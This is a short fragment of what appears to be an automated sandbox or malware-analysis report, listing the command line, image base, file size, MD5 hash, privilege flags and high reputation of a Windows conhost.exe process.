                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
